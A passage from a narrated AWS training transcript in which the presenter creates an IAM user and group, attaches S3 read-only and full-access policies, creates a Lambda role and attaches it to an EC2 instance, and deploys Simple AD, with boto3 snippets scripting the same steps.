We could copy permissions from another user, so we can mirror what's already been done and perhaps make
some changes.
[Video description begins] He selects the Copy permission from existing user tile and its corresponding table
with three columns and three rows displays. The column headers are User name, Groups, and Attached
policies. [Video description ends]
We can also attach policies directly to the user, much like we saw we could do for the group. I'm not going to
do any of those things yet, of course I could, I'll click Next: Tags.
[Video description begins] He selects the Attach existing policies directly tile and its corresponding table with
three columns and multiple rows displays. The column headers are Policy name, Type, and Used as. [Video
description ends]
I'm not going to add any additional tagging or metadata, I'll click Next: Review and then Create user.
[Video description begins] He clicks a button labeled "Next: Tags" and a page labeled Add tags (optional)
opens. It displays a table with three columns and a row. The column headers are Key, Value (optional), and
Remove. Then he clicks a button labeled "Next: Review" and a page labeled "Review" opens. It displays User
details such as User name and AWS access type. [Video description ends]
Now when I do this, because I selected to autogenerate the password, I can see the password is here. And I can
send an e-mail to the user's e-mail address with the sign-in information, in this case for user NParks.
[Video description begins] He clicks a button labeled "Create user" and a success message displays with a
table. The table has three columns and a row. The column headers are User, Password, and Email login
instructions. The row entry under the User name column header is NParks. The row entry under the Password
column header is hidden and a Show link is displayed. The row entry under the Email login instructions column header is a Send email link. He points to the row entries. [Video description ends]
I could also click Show and I could copy that and put it in some other kind of a list. So initially at least, that's
going to be important.
[Video description begins] He clicks the Show link and the hidden password appears. [Video description ends]
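For reference, the same Add user step can be scripted. This is a minimal boto3 sketch, assuming the NParks username from the demo; the password generation is just a stand-in for the console's autogenerate option.

# Minimal sketch of the Add user step with boto3: console access, an initial
# password, and a forced password change at next sign-in.
import secrets
import boto3

iam = boto3.client('iam')

# Create the IAM user.
iam.create_user(UserName='NParks')

# Stand-in for the autogenerated password option in the console.
initial_password = secrets.token_urlsafe(12) + 'aA1!'
iam.create_login_profile(
    UserName='NParks',
    Password=initial_password,
    PasswordResetRequired=True   # user must create a new password at next sign-in
)
print('Initial console password:', initial_password)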
Also, I can see that sign-in for IAM user accounts here in the Amazon Web Services cloud is done through a special URL, which is provided here at the top.
So having done that, I'm going to go ahead and copy that password for now. I'm going to close out, and at this
point I could even go into my new user NParks, go into Groups, and add the user to a group.
[Video description begins] He copies the following password under the Password column header:
'0oSkY0FWEIe. Then he clicks a button labeled "Close", the Add User wizard closes, and the Users blade
displays. Then he clicks the NParks row entry under the User name column header and its corresponding
blade opens. It displays two sections. The first section displays User ARN, Path, and Creation time
information. The second section contains five tabs labeled "Permissions", "Groups", "Tags", "Security
credentials", and "Access Advisor". The Permissions tab is selected by default. [Video description ends]
So you can do it from either the user or the group level; it makes no difference. I want this person to be in the East_Admins_Group, so I'll select it and click Add to Groups.
[Video description begins] He selects the Groups tab which includes a button labeled "Add user to groups".
Then he points to the Users sub option in the navigation pane. Then he clicks the Add user to groups button
and its corresponding page opens. It includes a table with four columns and four rows. The column headers
are Group Name, Users, Inline Policy, and Creation Time. He selects a checkbox adjacent to the
East_Admins_Group row entry under the Group Name column header. Then he clicks a button labeled "Add
to Groups". The Add user to groups page closes and the NParks blade displays. A row adds in the table with
two columns. The column headers are Group name and Attached permissions. The row entry under the Group
name column header is East_Admins_Group. [Video description ends]
Now that being said, there are no attached permissions because we didn't attach any to the group when we built
it. Let's go back to the East_Admins_Group in the Groups view. And let's open it up and let's Attach Policy.
Let's say we want to allow AmazonS3ReadOnlyAccess. And I'm going to click Attach Policy. It's showing up
here.
[Video description begins] He clicks the Groups sub option in the navigation pane and its corresponding table
opens in the blade. He clicks the East_Admins_Group row entry under the Group Name column header and its
corresponding blade opens. In the blade, the Permissions tab is open which includes the Attach Policy button.
He clicks the Attach Policy button and the Attach Policy page opens. He selects a checkbox adjacent to the
AmazonS3ReadOnlyAccess row entry under the Policy Name column header. Then he clicks the Attach Policy
button and the Attach Policy page closes. The East_Admins_Group blade displays in which a table is
displayed with two columns and a row. The column headers are Policy Name and Actions. Their respective
row entries are AmazonS3ReadOnlyAccess and Show Policy | Detach Policy | Simulate Policy. [Video
description ends]
Let's go back to Users>NParks. Now we can see that AmazonS3ReadOnlyAccess is now what this user gets by
extension of being in the group, coming from membership in the East_Admins_Group.
[Video description begins] He clicks the Users sub option in the navigation pane and its corresponding blade
opens. Then he clicks the NParks row entry under the User name column header and its corresponding blade
opens which includes the Permissions tab. The Permissions tab displays a table with two columns and a row.
The column headers are Policy name and Policy type. Their respective row entries are
AmazonS3ReadOnlyAccess and AWS managed policy from group East_Admins_Group. [Video description
ends]
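The group membership and policy attachment we just walked through could also be done programmatically. Here is a minimal boto3 sketch, using the names from this demo and the standard ARN for the AWS managed AmazonS3ReadOnlyAccess policy.

# Minimal sketch: add the user to the group, attach the managed policy to the
# group, and confirm what members of the group will inherit.
import boto3

iam = boto3.client('iam')

# Put the user in the group; the user inherits whatever the group is granted.
iam.add_user_to_group(GroupName='East_Admins_Group', UserName='NParks')

# Attach the AWS managed read-only S3 policy to the group.
iam.attach_group_policy(
    GroupName='East_Admins_Group',
    PolicyArn='arn:aws:iam::aws:policy/AmazonS3ReadOnlyAccess'
)

# List the group's attached policies.
for policy in iam.list_attached_group_policies(GroupName='East_Admins_Group')['AttachedPolicies']:
    print(policy['PolicyName'])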
Now at any point in time when I'm looking at the user details, I can go to Security credentials and see the sign-
in link. And I can also perhaps manage the password if it's been forgotten.
[Video description begins] He selects the Security credentials tab and the Sign-in credentials information
displays which includes Summary and Console password. He highlights a link adjacent to the Summary
information, which reads: https://611279832722.signin.aws.amazon.com/console. Then he clicks a link
labeled "Manage" adjacent to the Console password information. A dialog box labeled "Manage console
access" opens. [Video description ends]
Let's go ahead and give this a whirl. I'm going to go to this URL and try to sign in as user NParks with the autogenerated initial password. So when I go to sign in to the AWS Management Console, I can specify the account details. In fact, when I visit that special URL, it automatically fills in the AWS account ID. I'm going to put in the NParks username and the autogenerated password.
And of course, it says you must change your password to continue. So I'll specify the old password and I'll
specify and confirm a new password. And after that, it signs me into the AWS Management Console as user
NParks. And of course, I only have permissions to do what the attached policies allow.
[Video description begins] Topic title: Cloud User Permissions Policies. The presenter is Dan
Lachance. [Video description ends]
Here in the AWS Management Console, I'm going to assign permissions through the use of policies.
[Video description begins] The AWS Management Console opens. [Video description ends]
So here in the console, I'm going to search for IAM, identity and access management, and I'll click it in the
resultant list. And on the left if I click Groups, here I can see a bunch of groups that have been created already.
[Video description begins] He types iam in the Find services search box. The search result displays an IAM
link. He clicks the IAM link and the IAM Management Console opens. Then he clicks the Groups sub option in
the navigation pane and its corresponding blade opens in the content pane. The blade includes a Groups table
with four columns and four rows. The column headers are Group Name, Users, Inline Policy, and Creation
Time. [Video description ends]
Such as East_Admins_Group, Group1, Group2, Group3. If I click on any of these groups, I can see under the
Users tab who's a member of the group.
[Video description begins] He clicks the East_Admins_Group row entry under the Group Name column
header and its corresponding blade displays. He selects the Users tab which includes a table with two columns
and a row. The column headers are User and Actions. Their row entries are NParks and Remove User from
Group. [Video description ends]
And of course if I click on the Users view on the left, I'll see the individual user accounts here in Amazon Web
Services. These particular user accounts are used when we've got individual users that require access to AWS resources, whether programmatically or for management purposes through the GUI that I'm using here.
[Video description begins] He clicks the Users sub option in the navigation pane and its corresponding blade
displays. It includes a User and Groups table with multiple columns and four rows. The column headers
include User name, Groups, and Access key age. He points to CBlackwell, JGold, MBishop, and NParks row
entries under the User name column header. [Video description ends]
So I'm interested in a user NParks, who is a member of the East_Admins_Group. If I open up user NParks,
under Permissions, we don't see any listed.
[Video description begins] He clicks the NParks row entry. Its corresponding blade opens in which the
Permissions tab is displayed, which further includes a section labeled "Permissions policies". He points to the
section. [Video description ends]
Now that means that there are no permissions that are assigned to this individual user account. Nor are there
any permissions assigned to any groups that this user is a member of.
[Video description begins] He selects the Groups tab in the NParks blade and its corresponding table with two columns and a row displays. The column headers are Group name and Attached permissions. The row entry under the Group name column header is East_Admins_Group. There is no row entry under the Attached permissions column header. [Video description ends]
Now when I open up a group, just like when I open up a user, I can go into the Permissions and see if there are
any assigned.
[Video description begins] He selects the Groups sub option in the navigation pane and its corresponding
blade opens with the Groups table. He clicks the East_Admins_Group row entry under the Group name
column header and its corresponding blade opens. In the blade, he selects the Permissions tab which includes
the Attach Policy button in the Managed Policies section. [Video description ends]
Here we don't have any policies attached. And a policy is really just a collection of related permissions,
whether it's related to managing virtual machines in the cloud, or storage, or templates. So I'm going to click
Attach Policy.
[Video description begins] He clicks the Attach Policy button and the Attach Policy page opens. The Attach
Policy page contains the Policy Type filter box and a Policy table with three columns and multiple rows. The
column headers are Policy Name, Attached Entities, and Creation Time. [Video description ends]
Here I get a list of policies, an alphabetical list of policies at Amazon Web Services and there are plenty of
them. As I scroll further down the list, the list keeps updating and updating. There's a lot here. So for example,
I'm going to search for s3. S3 stands for simple storage service. It's cloud storage in the AWS environment.
[Video description begins] He types S3 in the Policy Type filter box and the filtered result displays in the
Policy table. [Video description ends]
So what I want to do is make sure that members of this group have the AmazonS3ReadOnlyAccess. So I'm
going to put that check mark on. Notice, I could turn on the check marks for other policies if they needed other
types of permissions as well to other AWS resources. Then I'm going to click Attach Policy. And it's done.
[Video description begins] He selects the checkbox adjacent to the AmazonS3ReadOnlyAccess row entry
under the Policy Name column header. Then he clicks the Attach Policy button and the Attach Policy page
closes. The East_Admins_Group blade displays. The table with two columns and a row is displayed in the
Permissions tab. The column headers are Policy Name and Actions. Their respective row entries are
AmazonS3ReadOnlyAccess and Show Policy | Detach Policy | Simulate Policy links. [Video description ends]
Now let's go back and check the user that's in that group; that would be user NParks. Notice that Permissions now shows AmazonS3ReadOnlyAccess by virtue of being in the East_Admins_Group.
[Video description begins] He opens the Users blade in which the Users and Groups table is displayed. Then
he clicks the NParks row entry under the User name column header and its corresponding blade opens in
which the Permissions tab is displayed. It includes the table with two columns and a row. The column headers
are Policy name and Policy type. Their row entries are AmazonS3ReadOnlyAccess and AWS managed policy
from group East_Admins_Group. [Video description ends]
So what we're going to do is we're going to sign in as this user to make sure that there is indeed read-only access to S3 storage, S3 buckets. So we're going to need to go to the Security credentials tab here because
there's the sign-in link that that user would sign in with. We know the username, NParks. But if we don't know
the password, we can also click Manage here and we can generate a new password.
[Video description begins] He opens the Security credentials tab. He highlights the Console sign-in link which
reads: https://611279832722.signin.aws.amazon.com/console. Then he clicks the Manage link adjacent to the
Console password text. The Manage console access dialog box opens. [Video description ends]
So for example, I could choose Autogenerated password. Apply, and I could choose Show. So I'm going to go
ahead and highlight and copy that password so I can sign in as user NParks given the URL for sign in.
[Video description begins] The Manage console access dialog box includes an option labeled "Set password".
The Set password option contains three radio buttons labeled "Keep existing password", "Autogenerated
password", and "Custom password". The Keep existing password radio button is selected. He selects the
Autogenerated password radio button. Then he clicks a button labeled "Apply". The New password dialog box
opens with the Console password information, which is hidden, and a Show link. He clicks the Show link and
the password labeled "PPk|L1#k@+2v" displays. He copies the password and closes the New password dialog
box. [Video description ends]
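Resetting a console password the way the Manage console access dialog does can likewise be scripted. A small hedged sketch with boto3 follows; the generated value simply stands in for the autogenerated password.

# Rough boto3 equivalent of managing the console password for an existing user.
import secrets
import boto3

iam = boto3.client('iam')

new_password = secrets.token_urlsafe(12) + 'aA1!'   # placeholder for the autogenerated password
iam.update_login_profile(
    UserName='NParks',
    Password=new_password,
    PasswordResetRequired=False   # optionally force another change at next sign-in
)
print('New console password:', new_password)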
So I'm going to go ahead and sign in as user NParks, I'll put in the password and sign in. And of course at this
point I am now going to be signed in to Amazon Web Services with that user account.
[Video description begins] He opens the AWS sign in page. In the Account ID or alias text box, 611279832722
value auto-populates. He types NParks in the IAM user name text box. Then he pastes the copied password in
the Password text box and clicks the Sign In button. The AWS sign in page closes and AWS Management
Console opens. [Video description ends]
I'm just going to switch over to a region where I know there are S3 cloud storage buckets, North Virginia.
[Video description begins] In the menu bar, he clicks the Ohio drop-down menu and a list of different regions
opens. He selects a region labeled "US East (N. Virginia) us-east-1". [Video description ends]
And in Find Services, I'll search for S3. Now that's going to open up the S3 Management Console. Remember,
this user should have read-only access. So let's just scroll down and here we can see there are a number of
buckets.
[Video description begins] He types S3 in the Find Services search box and the search result includes an S3
link. Then he clicks the S3 link and a window labeled "S3 Management Console" opens. The S3 Management
Console is divided into three parts: menu bar, navigation pane, and content pane. The navigation pane
includes options labeled "Buckets" and "Batch operations". The Buckets option is selected by default and its
corresponding blade is open in the content pane. The blade includes a search box, a button labeled "Create
bucket", and a table with four columns and multiple rows. The column headers are Bucket name, Access,
Region, and Date created. [Video description ends]
And if we start clicking on them to open them up, sure we can see what's there. What about if we try to upload
some contents?
[Video description begins] He clicks a bucketyyy row entry under the Bucket name column header and its
corresponding blade opens. The blade contains five tabs labeled "Overview", "Properties", "Permissions",
"Management", and "Access points". The Overview tab is selected. It includes a button labeled "Upload" and
a table with four columns and two rows. The column headers are Name, Last modified, Size, and Storage
class. [Video description ends]
Well, I have dragged a bunch of files here that I want to upload into the bucket. I'm going to keep going
through and accepting all of the defaults and I'm going to upload.
[Video description begins] He clicks the Upload button and a wizard labeled "Upload" opens in which a page
labeled "Select files" opens. The Select files page contains a button labeled "Add files". He clicks the Add files
button and a list of files displayed which contains four files labeled "CustomerDatabase.accdb",
"LicenseKey.txt", "Project_A.txt", and "Regional_Spending_2016.csv". Then he clicks a button labeled "Next"
and a page labeled "Set permissions" displays. [Video description ends]
However, we can see of course it's failing as it's uploading because all we have is read-only access to S3, we
don't have any write access.
[Video description begins] He clicks the Next button and a page labeled "Set properties" displays. Then he
clicks the Next button and a page labeled "Review" displays. Then he clicks a button labeled "Upload" and the
Upload wizard closes. An Upload status bar displays at the bottom of the content pane. It displays uploading
of all the files is failed. [Video description ends]
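One way to confirm this behavior without attempting an upload is the IAM policy simulator. The sketch below, run with credentials that are allowed to call IAM, checks a read action and a write action for the NParks user; the account ID matches the sign-in URL shown earlier in this demo.

# Minimal sketch: use the IAM policy simulator to check why reads succeed and
# writes fail for user NParks.
import boto3

iam = boto3.client('iam')

result = iam.simulate_principal_policy(
    PolicySourceArn='arn:aws:iam::611279832722:user/NParks',  # user ARN from this demo
    ActionNames=['s3:GetObject', 's3:PutObject']
)

for evaluation in result['EvaluationResults']:
    print(evaluation['EvalActionName'], '->', evaluation['EvalDecision'])
# Expected with only AmazonS3ReadOnlyAccess attached:
#   s3:GetObject -> allowed
#   s3:PutObject -> implicitDeny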
Interestingly, if we start going back to the main AWS screen and let's say we go into EC2 to look at virtual
machines, so EC2 > Instances.
[Video description begins] He clicks an icon labeled "aws" in the menu bar and the AWS Management
Console opens. Then he types ec2 in the Find Services search box and the search result includes EC2 link. He
clicks the EC2 link and a web page labeled "EC2 Management Console" opens. It is divided into three parts:
menu bar, navigation pane, and content pane. The navigation pane includes options labeled "EC2 Dashboard"
and "INSTANCES". The INSTANCES option is selected and its corresponding blade is open in the content
pane. The INSTANCES option includes sub options labeled "Instances" and "Instance Types". [Video
description ends]
If we were to start poking around in here, we also would not have access to even read anything. So here I don't even see that there are virtual machine instances in North Virginia.
[Video description begins] He selects the Instances sub option in the navigation pane and its corresponding
blade opens in the content pane. The blade displays a table with multiple columns and no rows. The column
headers include Name, Instance ID, and Instance Type. An error message displays which reads: An error
occurred fetching instance data: You are not authorized to perform this operation. [Video description ends]
However, when I am signed in with a different user account in that same geographical region, we can see that in fact there are all kinds of EC2 instances.
[Video description begins] He logs in with a different user in the EC2 Management Console in which the
Instances blade is open. The Instances blade displays a table with multiple columns and four rows. The
column headers include Name, Instance ID, and Instance Type. [Video description ends]
So working with IAM is going to vary from one system to the next. They're not all exactly the same and the
way that we administer them is always going to be a little bit different. But the underlying principles remain
the same.
In this video, you will create an IAM role in Amazon Web Services.
Objectives
[Video description begins] Topic title: Cloud IAM Role Creation. The presenter is Dan Lachance. [Video
description ends]
One interesting aspect of identity and access management is working with roles.
[Video description begins] The AWS Management Console opens. [Video description ends]
We're talking about roles as opposed to working with user accounts and groups. In essence, what a role does is
it represents a software entity. So an app component that might need access to a resource. Imagine that a
developer has built a component for a front-end web app that needs to fetch data from a back-end database.
And so it needs access, whether that be read, write, or list, whatever the case is. So in the past,
what might have been done is creating a dummy user account for that purpose, but these days instead, a role is
used. So a role would be used to assign permissions to a component. So we're going to take a look at how that
works in Amazon Web Services. So here from the console, I'm going to search for IAM, I'll click on the result
to open up the IAM Management Console, where on the left I can see Roles.
[Video description begins] He types iam in the Find Services search box and its search result displays an IAM
link. He clicks the IAM link and the IAM Management Console opens. The navigation pane includes an option
labeled "Dashboard". The Dashboard option is selected and its corresponding blade is open in the content
pane. [Video description ends]
Now there are plenty of built-in roles available, and what you configure in the AWS cloud environment will determine how many of these you actually see.
[Video description begins] In the navigation pane, the Access management option includes sub options labeled
"Roles" and "Policies". He selects the Roles sub option and its corresponding blade opens. The blade includes
a button labeled "Create role" and a Role table with three columns and multiple rows. The column headers
are Role name, Trusted entities, and Last activity. [Video description ends]
Now a lot of them are there all of the time, but some are specific to your actions in the cloud environment.
We're going to create a role. So I'm going to click the Create role button.
[Video description begins] A wizard labeled "Create role" opens. Its first step is divided into two sections. The
first section is labeled "Select type of trusted entity". It includes four tiles labeled "AWS service", "Another
AWS account", "Web identity", and "SAML 2.0 federation". The AWS service tile is selected. The second
section is labeled "Choose a use case". It displays a list of use cases which includes EC2 and Lambda. He
selects the Lambda use case. [Video description ends]
Now we can create a role for a specific AWS service that would need access to a resource. As in the example I described, where a software component on a front-end web app needs access to a back-end database, that happens all the time. Or it could be Another AWS account that we want to give permissions to, or some kind
of Web identity or SAML 2.0 federation authority. In this case, it's going to be AWS service. Okay, so let's say that we've got a developer that's created an AWS Lambda function. Lambda is a way to create functions that are hosted in the AWS cloud without having to set up the underlying server to support it. So it allows developers to build custom functions in the cloud. Okay, so let's say that's what we want to assign permissions to: some function that needs access. Let's say it needs access to an S3 storage bucket in Amazon Web Services, maybe to list files. So I'm going to go ahead and click on Lambda. Now that we've got that, I'm going to click Next: Permissions in the bottom-right. So what permissions does our AWS Lambda custom function require?
[Video description begins] The next step displays which is labeled "Attach permissions policies". It includes a
button labeled "Create policy", a search box labeled "Filter policies", and a table with two columns and
multiple rows. The column headers are Policy name and Used as. [Video description ends]
Well, we'd have to know what the developer did when they wrote the code for that function. Let's assume that
it needs access to S3. So we can search for S3 policies. Okay, well let's say it needs full access to S3 or maybe
it only needs read-only depending on how the code is written. But let's say in our case it's full S3 access. Okay,
well having done that, I'll click Next: Tags.
[Video description begins] He types s3 in the Filter policies search box and the filtered result displays in the
table. He points to AmazonS3FullAccess and AmazonS3ReadOnlyAccess row entries under the Policy name
column header. Then he selects a checkbox adjacent to the AmazonS3FullAccess row entry. [Video description
ends]
We can also add tagging values here, or metadata. Let's say this is for a project called ABC. Then we can just
flag it that way. So we could easily search for and group and assign costs to project ABC. I'll click Next:
Review.
[Video description begins] He clicks a button labeled "Next: Tags" and the next step displays labeled "Add
tags (optional)". It contains a table with three columns and a row. The column headers are Key, Value
(optional), and Remove. The row entries under the Key and Value (optional) column headers contain an empty
text box. He types Project and ABC in the respective text boxes. A cross sign appears under the Remove
column header. [Video description ends]
Then we have to give this role a name. So let's say this is WebApp1Comp1S3; maybe that's the name of the function. Well, it doesn't have to be the name of the function, but that's the name of the role, which might mirror the function and what it needs.
[Video description begins] The next step displays which is labeled as "Review". It includes a text box labeled
"Role name". He types WebApp1Comp1S3 in the Role name text box. [Video description ends]
Okay, so now that we've got all of that done, I'm going to just scroll down. Make sure everything looks good.
That's fine, nothing else we have to change here. I will create the role.
[Video description begins] He clicks a button labeled "Create role". The Create role wizard closes and the
Roles blade displays. [Video description ends]
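The same role could be created programmatically. Here is a minimal boto3 sketch: a trust policy that lets the Lambda service assume the role, the AmazonS3FullAccess managed policy, and the Project/ABC tag from this demo.

# Minimal sketch of the same role creation with boto3.
import json
import boto3

iam = boto3.client('iam')

# Trusted entity: the Lambda service is allowed to assume this role.
trust_policy = {
    "Version": "2012-10-17",
    "Statement": [{
        "Effect": "Allow",
        "Principal": {"Service": "lambda.amazonaws.com"},
        "Action": "sts:AssumeRole"
    }]
}

iam.create_role(
    RoleName='WebApp1Comp1S3',
    AssumeRolePolicyDocument=json.dumps(trust_policy),
    Tags=[{'Key': 'Project', 'Value': 'ABC'}]
)

# Permissions the role grants to whatever assumes it.
iam.attach_role_policy(
    RoleName='WebApp1Comp1S3',
    PolicyArn='arn:aws:iam::aws:policy/AmazonS3FullAccess'
)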
Now, there are a number of ways the role can be used. Often what happens is we might have some custom code, even running in an EC2 instance in Amazon Web Services. That means it's running within a virtual machine. And so we can assign the role to the virtual machine so that the code running in the virtual machine has the privileges of the role. Now, how would that work? Well, let's go back to the main AWS page and let's go into
the EC2 Management Console where we can go to the Instances view.
[Video description begins] The Instances blade includes a drop-down menu button labeled "Actions" and a
table with multiple columns and four rows. The column headers include Name, Instance ID, and Instance
Type. [Video description ends]
Let's say we've got a custom chunk of code; it doesn't have to be a Lambda function, but in our case it is. Basically, it's assigned to a particular virtual machine here, Linux1, so I'll select it.
[Video description begins] He selects a checkbox adjacent to a Linux1 row entry under the Name column
header. A section adds in the blade which contains four tabs labeled "Description", "Status checks",
"Monitoring", and "Tags". The Description tab is selected. [Video description ends]
What I can do is go to the Actions menu, and we have the ability to modify roles or attach roles for an instance
by going to Instance Settings. And you'll see over here on the right, we can choose to attach or replace an IAM
role.
[Video description begins] He clicks the Actions drop-down menu button and a flyout opens which includes
options labeled "Instance Settings" and "Image". He selects the Instance Settings option and a flyout opens
which includes sub options labeled "Attach/Replace IAM Role". He selects the Attach/Replace IAM Role sub
option and its corresponding blade displays. [Video description ends]
And from this list, we can specify exactly which role that we want to assign here. So it could be any of the
roles that we've got created. So you can do it there, you can also create a new role from here.
[Video description begins] The Attach/Replace IAM Role blade includes a drop-down list box labeled "IAM
role". The AmazonSSMRoleForInstancesQuickSetup is a default role selected in the drop-down list box. He
clicks the drop-down list box and a drop-down list appears which includes role options labeled "No Role" and
"AmazonSSMRoleForInstancesQuickSetup". He points to a link labeled "Create new IAM role". [Video
description ends]
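Attaching a role to a running instance can also be done from code. Under the hood the role is attached through an instance profile, which the console normally creates for you; the sketch below creates one explicitly, and the instance ID is a placeholder for Linux1.

# Rough equivalent of Attach/Replace IAM Role using boto3.
import boto3

iam = boto3.client('iam')
ec2 = boto3.client('ec2')

# Wrap the role in an instance profile (the console usually does this behind the scenes).
iam.create_instance_profile(InstanceProfileName='WebApp1Comp1S3')
iam.add_role_to_instance_profile(
    InstanceProfileName='WebApp1Comp1S3',
    RoleName='WebApp1Comp1S3'
)

# Associate the instance profile with the virtual machine.
ec2.associate_iam_instance_profile(
    IamInstanceProfile={'Name': 'WebApp1Comp1S3'},
    InstanceId='i-0123456789abcdef0'   # placeholder ID for the Linux1 instance
)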
Also, if you're launching a new instance, for example, part of what you see as you're configuring it, and I'll just quickly go through this, is that you can assign a role as you're creating the instance, right here with IAM role.
[Video description begins] He clicks a button labeled "Cancel". The Attach/Replace IAM Role blade closes.
The Instance blade displays. He clicks a drop-down button labeled "Launch instance". A wizard with seven
steps displays. The first step is labeled "Choose AMI". It includes a tab labeled "Quick Start". It includes a list
of AMIs such as Amazon Linux 2 AMI (HVM), SSD Volume Type. Each AMI is linked with a button labeled
"Select". He clicks the Select button adjacent to the Amazon Linux 2 AMI (HVM), SSD Volume Type AMI. The
second step labeled "Choose Instance Type" appears. Then he clicks a button labeled "Next: Configure
Instance". The third step labeled "Configure Instance" appears. He clicks a drop-down list box labeled "IAM
role". The drop-down list includes role options labeled "None" and
"AmazonSSMRoleForInstancesQuickSetup". [Video description ends]
So we've got a number of options available for that. So the role is just another way to assign permissions. So
let's just go back here very quickly into the IAM Management Console.
[Video description begins] He clicks the aws icon in the menu bar and the AWS Management Console
opens. [Video description ends]
[Video description begins] He types iam in the Find Service search box and selects IAM link in the search
result. The IAM Management Console opens. He clicks the Roles sub option in the navigation pane and its
corresponding blade displays in the content pane. [Video description ends]
Again this is where we'll see all of the roles including our custom roles. So if I filter for web, there it is right
there.
[Video description begins] He types web in the search box and the table displays the web associated filtered
result. [Video description ends]
WebApp1Comp1S3. And if I click on it to open it up, we can see the Permissions that the role was assigned, in
this case AmazonS3FullAccess.
[Video description begins] He clicks the WebApp1Comp1S3 row entry under the Role name column header
and its corresponding blade displays. It includes a Permissions tab which includes a table with two columns
and a row. The column headers are Policy name and Policy type. Then he points to the AmazonS3FullAccess
row entry under the Policy name column header. [Video description ends]
In this video, find out how to deploy Simple Active Directory in Amazon Web Services.
Objectives
[Video description begins] Topic title: Cloud Directory Services. The presenter is Dan Lachance. [Video
description ends]
Now this is essentially similar to what we would get if we installed and configured Microsoft Active Directory Domain Services on-premises. The difference is that with just a few clicks, we can get this running in the cloud, whether it's running on true underlying Windows servers or on Linux hosts running Samba to emulate Windows functionality, including Domain Services. So here in Amazon Web Services, I'm going to
start in the console by searching for the word directory, and then I'll choose Directory Service. If I have any
existing directory stores here, they'll be shown in the list, but we don't have any yet.
[Video description begins] He types direct in the Find Services search box and the search result includes a
link labeled "Directory Service". Then he clicks the Directory Service link and its corresponding web page
opens. It is divided into three parts: menu bar, navigation pane, and content pane. The navigation pane
contains two options labeled "Active Directory" and "Cloud Directory". The Active Directory contains two sub
options labeled "Directories" and "Directories shared with me". The Directories sub option is selected and its
corresponding blade is open in the content pane. The blade includes a button labeled "Set up directory" and a
table with multiple columns and no rows. The column headers include Directory ID, Directory name, and
Type. [Video description ends]
So I'm going to click the Set up directory button over on the right. And we've got a number of options.
[Video description begins] A wizard labeled "Set up a directory" opens in which the first step labeled "Select
directory type" is displayed. [Video description ends]
If you want true Microsoft Active Directory, then you can use AWS Managed Microsoft AD. But I just need Simple AD, which is powered by Linux and Samba; that's perfect for what I need to do. I don't need a lot of users or a lot of additional capabilities. So I'm going to go with that, and I'm going to click Next. I only have a small number of users, so I'll choose a small directory size.
[Video description begins] He selects a radio button labeled "Simple AD". Then he clicks a button labeled
"Next". The second step labeled "Enter directory information" displays. It includes two tiles labeled "Small"
and "Large". [Video description ends]
And then I'll fill in some details such as the Directory DNS name. So I filled in the DNS name for my domain
as well as the NetBIOS name, and I've specified and confirmed an administrator password. I'm going to go
ahead and click Next.
[Video description begins] He selects a radio button in the Small tile and then text boxes labeled "Directory
DNS name" and "Directory NetBIOS name - Optional" populates with quick24x7.local and quick24x7 values
respectively. He sets the password in the text boxes labeled "Administrator password" and "Confirm
Password". [Video description ends]
I can also determine the VPC that this will be available in. So that means that I can have, for example, virtual machines in the same cloud network location that can be joined to this domain. So I'm going to choose VPC1_Subnet1 and VPC1_Subnet2.
[Video description begins] The third step labeled "Choose VPC and subnets" displays. It includes drop-down
list boxes labeled "VPC" and "Subnets". [Video description ends]
And I'm going to click Next. And on the summary screen, that's about it. That's all I want to do. So I'm going
to go ahead and click Create directory. Now this might take a few minutes. We can see here that the Status is
listed as Creating.
[Video description begins] The fourth step labeled "Review & Create" displays. [Video description ends]
So I can periodically click the Refresh button until such time that my cloud deployment of the Samba-based
Active Directory is ready to go.
[Video description begins] The Directories blade displays. It includes a table with multiple columns and a
row. The column headers include Directory ID, Type, Size, and Status. He points to a Creating row entry
under the Status column header. Then he clicks a button labeled "Refresh". The status remains the
same. [Video description ends]
And before too long, the Status will switch to Active. So if we click on the link for our Directory ID, that'll
open it up. And we'll see that we've got our Simple Active Directory that is still in the midst of being created.
It's not quite finished up here, but we can still click on the Refresh button. When we see that it's Active, we'll
also see that it's got DNS server IP addresses. Any machines that you want to join to an Active Directory
domain need to be able to locate domain server DNS records.
[Video description begins] He clicks a d-906771189a row entry under the Directory ID column header and its
corresponding blade opens. It includes detailed information about the Directory which includes Directory
type: Simple AD and Status: Creating. He clicks the Refresh button and the status changes to Active. The
directory information also includes DNS address: 172.31.92.197 and 172.31.8.187. He highlights the DNS
addresses. [Video description ends]
Specifically, they need to locate service location (SRV) records. And so these IP addresses are what your machines need to be pointing to for DNS before they can join the domain.
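For completeness, the same Simple AD deployment can be requested through the Directory Service API. A minimal boto3 sketch follows, in which the VPC and subnet IDs and the administrator password are placeholders.

# Minimal sketch of the Simple AD deployment with boto3; IDs and password are placeholders.
import boto3

ds = boto3.client('ds')

response = ds.create_directory(
    Name='quick24x7.local',          # Directory DNS name
    ShortName='quick24x7',           # NetBIOS name
    Password='Placeh0lder!Admin',    # administrator password (placeholder)
    Size='Small',                    # small directory size
    VpcSettings={
        'VpcId': 'vpc-0123456789abcdef0',                    # placeholder VPC
        'SubnetIds': ['subnet-aaaa1111', 'subnet-bbbb2222']  # two subnets in different AZs
    }
)

# Once the directory reaches the Active stage, read the DNS server IP addresses
# that domain-joining machines must point to.
details = ds.describe_directories(DirectoryIds=[response['DirectoryId']])
print(details['DirectoryDescriptions'][0].get('DnsIpAddrs'))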
Joining Windows computers to an Active Directory domain is beneficial because we have centralized configuration management capabilities as a result of doing that. It also allows users to sign in to any domain-
joined computer using their centralized Active Directory domain credentials.
[Video description begins] The AWS Management Console opens. [Video description ends]
Here in the AWS cloud, in the console, if I search for directory and then choose Directory Service, I'll see that I've got an instance of Active Directory, specifically Simple Active Directory, which means it's really running on Linux. And the domain name is quick24x7.local.
[Video description begins] He types directory in the Find Services search box. Its search result includes the
Directory Service link. He clicks the Directory Service link and its corresponding web page opens. The
Directories sub option is selected in the navigation pane and its corresponding blade is open in the content
pane. [Video description ends]
And if I click on the link to open it up, I can see the DNS server IP addresses.
[Video description begins] He clicks the d-906771189a row entry under the Directory ID column header and
its corresponding blade opens. He highlights the DNS address: 172.31.92.197 and 172.31.8.187. [Video
description ends]
Which is important when you want to join a computer to this domain. So back here at the main page of the
AWS Management Console. I've got a couple of EC2 instances or virtual machines. They are running
Windows Server 2019 and they're both listed here as running. So they have an Instance State of running.
[Video description begins] He switches to the AWS Management Console. Then he clicks a link labeled "EC2"
displayed in a section labeled "All services". The EC2 Management Console opens. He clicks the Instances
